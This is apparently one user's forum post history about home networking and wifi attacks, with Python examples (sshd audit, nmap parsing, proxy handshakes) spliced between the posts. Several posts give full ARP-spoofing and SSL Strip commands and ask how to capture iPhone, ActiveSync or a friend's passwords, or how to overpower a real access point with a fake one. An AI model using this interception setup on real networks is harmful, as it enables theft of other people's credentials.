michael_kent123

Posts posted by michael_kent123

  1. The security implication seems obvious: the internet can access that port on your VPN and through it gain access to your personal system inside your LAN. It's like having armed guards and pill boxes and turrets and moats in front of your house, and leaving the back gate open.

    Well, yes, but they would have to know the password. When I SSH to the VPN IP, it asks me for my password. Unless the password to my system is obvious, I don't see a problem. Or am I too naive?

  2. I will check out the video over the weekend.

    One more thing that I kind of but not completely understand.

    I have SSH installed on my computer. If I ssh to my IP address provided by my ISP then the connection fails. However, if I connect to my VPN and then ssh to the VPN IP, I get a connection. I can log in to my system using the password I use to log in to my computer.

    I'm assuming that's how SSH is supposed to work (it's as if I was contacting my IP from a remote system) and the VPN has allowed its users to SSH to their home computers via the VPN IP. Does that make sense? Are there any security implications?

    Many thanks!
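As an added example (not from the thread): once sshd answers on a public address, as it does here through the VPN provider's IP, the settings that matter are whether passwords are accepted at all, whether root can log in, and whether keys are enabled. This Python check reads an sshd_config the way sshd does (first occurrence of a keyword wins, keywords are case-insensitive, Match blocks are conditional) and reports the risky values; it assumes stock OpenSSH defaults for the three keywords it audits, does not follow Include lines, and the two sample configs are constructed.

```python
from typing import Dict, List

# Stock OpenSSH defaults for the audited keywords (assumption: no distro-level override).
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
}
# Constructed sample: an untouched desktop sshd_config, password logins left at the default.
DESKTOP_DEFAULT = """\
Include /etc/ssh/sshd_config.d/*.conf
#PasswordAuthentication yes
"""
# Constructed sample: hardened for exposure beyond the LAN, with two traps for a naive parser.
HARDENED = """\
PasswordAuthentication no
PermitRootLogin no
PubkeyAuthentication yes
# sshd keeps the FIRST value it saw, so this later duplicate is ignored:
PasswordAuthentication yes
Match User backup
    PasswordAuthentication yes
"""

def parse_sshd_config(text: str) -> Dict[str, str]:
    """Effective global values: first match wins, 'Key value' or 'Key=value', Match blocks skipped."""
    effective, seen, in_match = dict(DEFAULTS), set(), False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        keyword = parts[0].lower()
        if keyword == "match":
            in_match = True          # everything after Match applies only to matching sessions
            continue
        if in_match or len(parts) < 2 or keyword in seen:
            continue
        seen.add(keyword)
        effective[keyword] = parts[1].strip().lower()
    return effective

def audit(text: str) -> List[str]:
    """Findings that matter once sshd is reachable from the Internet (here: via the VPN's IP)."""
    cfg = parse_sshd_config(text)
    findings = []
    if cfg["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: login is only as strong as the account password; use keys")
    if cfg["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: the root account can be guessed at directly")
    if cfg["pubkeyauthentication"] != "yes":
        findings.append("PubkeyAuthentication off: no key-based alternative is available")
    return findings
```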

  3. Thanks for the information - I've done some more research as you suggested.

    I scanned my external IP from inside my LAN:

    Not shown: 997 closed ports
    PORT STATE SERVICE
    23/tcp open telnet #
    1900/tcp open upnp # Upnp is turned off on the router so I don't know why this is open.
    40001/tcp open unknown # This is the way I connect to the router 192.168.1.1:40001

    I scanned my external IP from my VPN IP:

    Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
    Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds

    I typed my external IP:40001 into the browser and, when using the VPN, it timed out. When I typed my external IP:port in (without using a VPN) it brought up the login screen. So my impression is that the router is not accessible from the internet.

  4. I have a TP-Link router and recently ran an nmap scan on it from inside my network. I'm not too worried about the results as I have turned remote admin off so the router is inaccessible from the internet. I am using the Ubuntu OS.

    Nonetheless, there are a few things I do not understand. Here are my results:

    23/tcp open telnet
    1900/tcp open upnp
    2000/tcp open cisco-sccp
    2001/tcp open dc
    9000/tcp open cslistener

    Telnet makes sense; it's a way to connect to the router.

    Upnp I understand but, even though I've disabled it in the admin panel, it still shows "open". Maybe nmap is supposed to show it as open, even though it's closed from the perspective of the router. I don't know.

    Sccp (https://en.wikipedia.org/wiki/Skinny_Call_Control_Protocol) is a Cisco protocol which makes no sense to me as I don't have a Cisco router unless TP-Link has paid to use this proprietary protocol.

    Dc seems very mysterious and no-one seems to know what it is.

    Cslistener (http://brianoneill.blogspot.com/2012/02/cslistener-on-mac-osx-on-port-9000.html) may be the Checkpoint firewall, which I have not installed.

    More generally, is there a way to run a netstat-like command on the router IP? I can telnet to it but I can't run commands like netstat to check what is happening on these ports from the router's perspective.

    Any ideas?
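As an added example (not from the posts), a small Python parser for the kind of nmap output shown in the two router scans above: it reads the port table, treats a "Host seems down" result as "no ports observed", and reports which LAN-visible ports are also open from outside and which are management services that should not be reachable by arbitrary hosts. The scan text is constructed to mirror the posts.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample output modelled on the two scans in the posts (nmap normal output format).
LAN_SCAN = """\
Not shown: 997 closed ports
PORT      STATE SERVICE
23/tcp    open  telnet
1900/tcp  open  upnp
40001/tcp open  unknown
"""
EXTERNAL_SCAN = """\
Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds
"""
# Constructed counter-example: the external scan as it would look if telnet leaked to the WAN side.
EXTERNAL_EXPOSED = """\
PORT   STATE SERVICE
23/tcp open  telnet
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# Services that should only ever be reachable from a trusted admin host.
RISKY = {"telnet": "cleartext management login", "upnp": "unauthenticated port-mapping control"}

def parse_nmap(text: str) -> Dict[int, Tuple[str, str]]:
    """Return {port: (state, service)} from nmap's normal output; header and summary lines are skipped."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4))
    return ports

def host_answered(text: str) -> bool:
    """False when nmap gave up before port scanning. A host that merely blocks ping is NOT proven
    closed: rerun with -Pn (the post's '-PN') before trusting a 'lan_only' verdict."""
    return "Host seems down" not in text and "(0 hosts up)" not in text

def compare_scans(lan_text: str, external_text: str) -> Dict[str, List]:
    """Classify every port open from the LAN by whether it is also open from the outside."""
    lan = parse_nmap(lan_text)
    ext = parse_nmap(external_text) if host_answered(external_text) else {}
    result = {"exposed": [], "lan_only": [], "risky": []}
    for port, (state, service) in sorted(lan.items()):
        if state != "open":
            continue
        reach = "exposed" if ext.get(port, ("",))[0] == "open" else "lan_only"
        result[reach].append((port, service))
        if service in RISKY:   # risky even LAN-only: any compromised LAN device can reach it
            result["risky"].append((port, service, RISKY[service]))
    return result
```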

  5. I finally tried tcpick but had no success. Here is what I did.

    Terminal 1:

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    arpspoof -i wlan0 192.168.1.1 [router IP]

    Terminal 2:

    sslstrip -l 10000 -k

    Terminal 3:

    sudo tcpick -i wlan0 -bPS -C "port 443"

    Terminal 4:

    sudo tcpick -i wlan0 -bPC -C "port 443"

    I then sent an e-mail from a different device to a Hotmail address which was set up on my iPhone with ActiveSync.

    Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log).

    The tcpick server shows content like:


    The tcpick client just showed connections to Microsoft's IP addresses.

    For example:

    SYN-SENT 192.168.1.10:51999 > 207.46.11.152:https
    SYN-SENT 192.168.1.10:53999 > 207.46.11.152:https
    RESET 192.168.1.10:51999 > 207.46.11.152:https
    RESET 192.168.1.10:51999 > 207.46.11.152:https

    I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown. Just IP addresses.

    Any ideas? Thanks.

  6. Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync

    Basically, it is the way in which iPhone users set up their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details.

    Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites.

    Here is how I set up SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone.

    echo "1" > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    arpspoof -i wlan1 gateway_ip

    sslstrip -l 10000 -k

    I then sent an e-mail from a different device to the iPhone. I used Wireshark which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password were sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range 207.46.0.0 - 207.46.255.255 which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols.

    There is also a transmission to 132.245.0.0 - 132.245.255.255 which is Microsoft using IMAPS.

    However, when I checked the SSL Strip log, nothing was recorded. Obviously, using ActiveSync is not the same as logging into a HTTPS website. But ActiveSync does use HTTPS so I thought that SSL Strip might work. Clearly I was wrong.

    Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is setup with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.

  7. On a related note, I wonder if you know anything about Microsoft Active Sync.

    I set up a Hotmail account on my iPhone. To connect to the server, Microsoft apparently uses HTTPS on port 443. See, for example, http://www.altn.com/Support/FAQ/FAQResults/?Number=KBA-02281

    I used arpspoof and SSLStrip in the normal way (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000).

    I then sent an e-mail from my Desktop to my Hotmail account on my iPhone. The phone downloaded the message.

    However, when I checked the SSLStrip log, nothing showed.

    When, on the iPhone, I log in to a webmail account (port 443) the username:password does show in my log.

    I'm wondering if there is a way to intercept the username:password between Hotmail on the iPhone using SSLStrip.

    Any ideas? Thanks!

  8. To use SSL Strip:

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    Why is the destination port 80 since we want to redirect HTTPS traffic? Shouldn't it be port 443?

    Let's say I want to intercept secure POP which uses port 995.

    Can I just do:

    iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-port 10000

    Or should it be port 110 (POP) considering that HTTPS apparently uses port 80 (not 443)?

  9. Promiscuous mode - ability to see packets on the wifi network you are connected to that are not directed to your MAC.

    Monitor mode - ability to see packets on wifi networks to which you are not connected but that your NIC can sniff.

    However, since modern networks are switches rather than hubs, promiscuous mode no longer really exists.

    Therefore, am I correct when I say that:

    Monitor mode is like promiscuous mode for the network you are connected to plus you can also view nearby networks.

    So, if I am on SSID "Hello" and my friend is on "Hello" and he sends a non-SSL username:password to his e-mail provider, and I am in monitor mode, then I can view that password in Wireshark.

    Is that correct? Thanks!

  10. The other issue I wanted to ask is about increasing power via antennas. I know nothing about antenna theory. I have a 9 dBi antenna for the Alfa.

    What is the most powerful indoor antenna I can get for the Alfa (i.e. not having to attach it to the side of a house)?

    Does the antenna affect only tx power or also the ability to receive better?

  11. Think of the wifi adapter as a megaphone, measured in decibels. The non-deaf people around you are the various wifi radios nearby, be it clients or APs. The tx power is the volume knob on the megaphone, and the effect it would have on the people around you is the same effect it would have on the radios nearby.

    So with a higher transmission power your outbound signal travels further and is more likely to overpower the other signals (at the same frequency).

    - You can inject packets more reliably because when you and the legitimate transmitter send the data at the same time, your signal is more likely to overpower the legitimate one and because of this end up being the signal actually heard by the receiver.

    - You can transmit your data over a greater distance.

    - It has no effect on your receiving capability, so you won't pick up any more packets than you did previously.

    You want to ARP spoof once you MITM'd a connection. Having a higher transmission power means you can appear 'closer' to the client making it want to prefer your signal over the legitimate one and even allowing you to overpower the legitimate signal because you're 'louder'. Once you're in between you can pull out your usual bag of tricks and go play as you would otherwise, which might involve arp spoofing.

    Is there any reason therefore not to increase the tx power to 30? It seems to only do good things.

    More specifically, if one created a "soft" or fake AP, a higher tx power would presumably overcome the "real" signals from the genuine AP?

  12. Thanks - this is a helpful explanation.

    There is a thread in the Pineapple section on the best Alfa for Pineapple. I am wondering what the best Alfa is for those of us who want to use it for arpspoofing, packet injection, etc.

    In terms of tx power, a poster seems to be suggesting that one Alfa model can provide 2 dBi. I don't understand this if you can only alter the tx power to 30 (using iw reg set BO).

    Thanks again!

  13. I was recently watching a video by Vivek Ramachandran on how to increase the tx power of the Alfa card.

    Question: what is the benefit of this?

    Does it allow the Alfa to "see" networks that are further away?

    Does it allow for packet injection over a further distance?

    Does it give a benefit for arpspoofing e.g. being able to transmit the fake MAC of the router over a greater distance?

    Can someone please articulate the benefits of tx power 30 over, say, tx power 20?

  14. I highly dislike the AWUS036NEH adapter; I find it to be less strong at picking up networks than my AWUS036H. I've got 4 wireless adapters and out of all of them I get the best signals from my Alfa Network AWUS036H, the silver one, legit Alfa with the sticker, the one Hak5 sells. It doesn't pick up networks as well; I'd say I lose 2 bars compared to the AWUS036H.

    I have an AWUS036H which I'm happy with. I'm going to buy another card.

    I would predominantly use it for accessing wifi, arpspoofing, and packet injection.

    Should I get another 036H or something else?

  15. The NEH is low power consumption and max 1 watt, and is in a smaller case. The NH is higher power consumption and 2 watts, and is in a bigger case.

    Are there any benefits to 2 watts which is, I believe, 33 dBm?

    After all, the maximum the txpower can be set to is 30 dBm (iw reg set BO).

  16. I have an Alfa AWUS036H which is, I guess, at least five years old. I want to buy an additional Alfa but have noticed there are multiple versions. A search on this forum reveals:

    AWUS036NEH

    AWUS036NHR

    AWUS036H

    AWUS036NHA

    AWUS036A

    There are numerous other versions here.

    I also purchased a 9dBi antenna so whatever I get needs to be able to add an antenna.

    If you were buying an Alfa for airmon-ng mode, packet injection, etc, what version would you get?

  17. Some sites like Facebook these days use HSTS, so they won't load without SSL on most of them. For those, you can use a captive portal attack to clone and fake the login page and then serve it to end users if you own the network and their connections with a MITM and DNS rebinding, but for things like your iPhone apps and such, you'll need to grab the token or process it uses to log in with your stored credentials, and they may not be simple HTTPS logins happening, since the apps for different sites may use other login methods and protocols with client-side encryption. Depending on how well they protect the process, you'd most likely need an app on the device to read the info for you vs. trying to pull an external MITM, but a local one, from memory attacks to intercepting the data being sent over the pipe, may show more of what is going on and what you can do to gain access to their authentication mechanisms.

    Kos demoed an attack for Android devices that showed how Google used a simple URL and token to authenticate devices and access Google user accounts, but that may be patched now (don't quote me on that). His example of how this was done is in an episode of Hak5 a few seasons back.

    Thank you for the answer.

    I have a couple of questions. I've read about HSTS (https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security). The article claims that HSTS defeats SSL Strip. I don't understand this because, using the latest version of both IE and FF, I just successfully stripped my HTTPS connections to websites like Facebook and Gmail.

    What I still don't understand is how the app validates the user. Is the user's username and password being sent to a server as in the traditional client / server model?

  18. I have wondered for some time how apps (e.g. Facebook, Twitter, or Instagram) on an iPhone or Android device transmit the username and password.

    For example, if I am using a laptop and want to log in to Facebook then I browse to https://www.facebook.com and enter my username and password which is transmitted to Facebook which checks whether it is accurate or not.

    However, if I use the Facebook app, how is the username and password invoked?

    If you are a MITM and you intercept client-server communications (e.g. with SSL Strip) then you can get my Facebook username and password. However, if I am using an app (over wireless) to login to Facebook then can you as the MITM grab my login details?

    In all cases, we are using a wireless network.

  19. Hello,

    I have wondered for some time about the difference between proxy types.

    For example, Tor uses SOCKS 5. On the other hand, I can find lists of proxies and enter the IP:port into the HTTP proxy section of Firefox.

    What is the difference in practical usage between an HTTP proxy and a SOCKS 5 proxy?

    How are these proxies used? Are they used for different purposes? What are their advantages and disadvantages?

    Thank you.
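As an added example (not from the thread), the bytes each proxy type actually exchanges, which is where the practical difference lives: a SOCKS5 proxy (Tor's SocksPort, for instance) takes a short binary handshake and then relays any TCP stream without understanding it, and when the client sends a hostname (ATYP 0x03) the proxy does the DNS lookup; an HTTP proxy speaks HTTP, either reading a cleartext request with an absolute URL or, for HTTPS, opening a blind tunnel on a CONNECT request. Constants follow RFC 1928 and RFC 7231; the hosts and URLs in the tests are constructed.

```python
import socket
import struct
from typing import Tuple
from urllib.parse import urlsplit

SOCKS5, NO_AUTH, CMD_CONNECT = 0x05, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
              3: "network unreachable", 4: "host unreachable", 5: "connection refused"}

def socks5_greeting() -> bytes:
    """Client hello offering only 'no authentication', the method a default Tor SocksPort accepts."""
    return bytes([SOCKS5, 1, NO_AUTH])

def socks5_connect(host: str, port: int) -> bytes:
    """CONNECT request. A hostname goes out as ATYP 0x03 so the proxy (e.g. Tor) resolves it;
    a pre-resolved IPv4 (ATYP 0x01) means the client already did a DNS lookup locally."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS5, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)

def parse_socks5_reply(data: bytes) -> Tuple[bool, str]:
    """Read the server's CONNECT reply; application bytes may only flow after a 0x00 status."""
    if len(data) < 2 or data[0] != SOCKS5:
        return False, "not a SOCKS5 reply"
    return data[1] == 0, REPLY_TEXT.get(data[1], f"unknown code {data[1]}")

def http_connect(host: str, port: int) -> bytes:
    """HTTP proxy, tunnel form: CONNECT asks for a raw TCP pipe (how browsers do HTTPS via a proxy).
    The proxy learns host:port but cannot read the TLS inside the tunnel."""
    target = f"{host}:{port}"
    return f"CONNECT {target} HTTP/1.1\r\nHost: {target}\r\n\r\n".encode("ascii")

def http_proxy_get(url: str) -> bytes:
    """HTTP proxy, forwarding form: the absolute URL is in the request line, so the proxy parses it,
    may cache or rewrite, and sees the whole cleartext request and response."""
    u = urlsplit(url)
    return f"GET {url} HTTP/1.1\r\nHost: {u.netloc}\r\n\r\n".encode("ascii")
```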

  20. I have a question about the use of VPN services.

    If you go to www.whatismyip.com or equivalent then you see the VPN IP not the ISP IP.

    Normally, I have an internal 192.168.x.x IP and my ISP IP. With a VPN, I have the internal IP and the VPN IP.

    So, when using a VPN, does that mean that there is no ISP IP but only an internal IP and a VPN IP? In other words, does the VPN effectively replace the ISP IP with its IP?

    Is it:

    a) 192.168.x.x --> VPN IP.

    or

    b) 192.168.x.x --> ISP IP --> VPN IP.

    Thank you!

  21. Here is something I do not understand even though I'm sure there is a simple answer.

    I SSH to my VPS. This VPS has not had DNS propagation started. I can only access it via an IP address. I upload some files to /var/www/

    I then go in the web browser to the VPS IP. I can see the files e.g. index.html.

    Here is what I do not understand.

    How does the web browser know the correct content to serve me? Presumably, I am not the only person using that IP address.

    If I were to have linked the domain name to the IP via DNS propagation, then my domain panel would point to the nameservers of the VPS and I would have entered my domain name in the VPS control panel. Hence, when I request www.domain.com, I am given the correct files as the domain name and IP are linked.

    But in this case, I just type http://50.50.50.50/index.html. How does the VPS know what to give me? The files are stored on their servers. I do not host anything in my /var/www/ directory.
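As an added example (not from the post): a VPS with its own public IP is the only machine answering at that address, so a request to http://50.50.50.50/index.html reaches its web server and is served from that server's default document root. Where several names do share one address, the server chooses the site from the Host header; this Python miniature shows that dispatch, with a bare IP, an unknown name or a Host-less HTTP/1.0 request all falling through to the default site, and with the request path confined to the chosen root. The vhost table and requests are constructed.

```python
import posixpath
from typing import Dict, Optional

# Constructed virtual-host table for one server: document roots keyed by server name.
VHOSTS: Dict[str, str] = {
    "www.domain.com": "/var/www/domain",
    "blog.domain.com": "/var/www/blog",
}
DEFAULT_ROOT = "/var/www"   # the site served when no name matches, including requests by bare IP

def host_header(request: bytes) -> Optional[str]:
    """Host header value without the port, or None for a header-less HTTP/1.0 request."""
    head = request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            host = value.strip().lower()
            if host.startswith("["):                    # IPv6 literal such as [::1]:8080
                return host[1:].split("]", 1)[0]
            return host.split(":", 1)[0]
    return None

def select_document_root(request: bytes, vhosts: Dict[str, str] = VHOSTS,
                         default: str = DEFAULT_ROOT) -> str:
    """Name-based virtual hosting in miniature: several names can share one IP address and the
    Host header picks the site; a bare IP, an unknown name or no Host at all gets the default."""
    host = host_header(request)
    return default if host is None else vhosts.get(host, default)

def resolve_path(request: bytes, vhosts: Dict[str, str] = VHOSTS,
                 default: str = DEFAULT_ROOT) -> Optional[str]:
    """Map the request path onto the chosen root; None if it would escape that root."""
    root = select_document_root(request, vhosts, default)
    parts = request.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2:
        return None
    path = parts[1].split("?", 1)[0]
    if path.endswith("/"):
        path += "index.html"                         # directory request: serve the index page
    full = posixpath.normpath(root + "/" + path.lstrip("/"))
    return full if full.startswith(root + "/") else None   # normpath has collapsed any ../ segments
```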
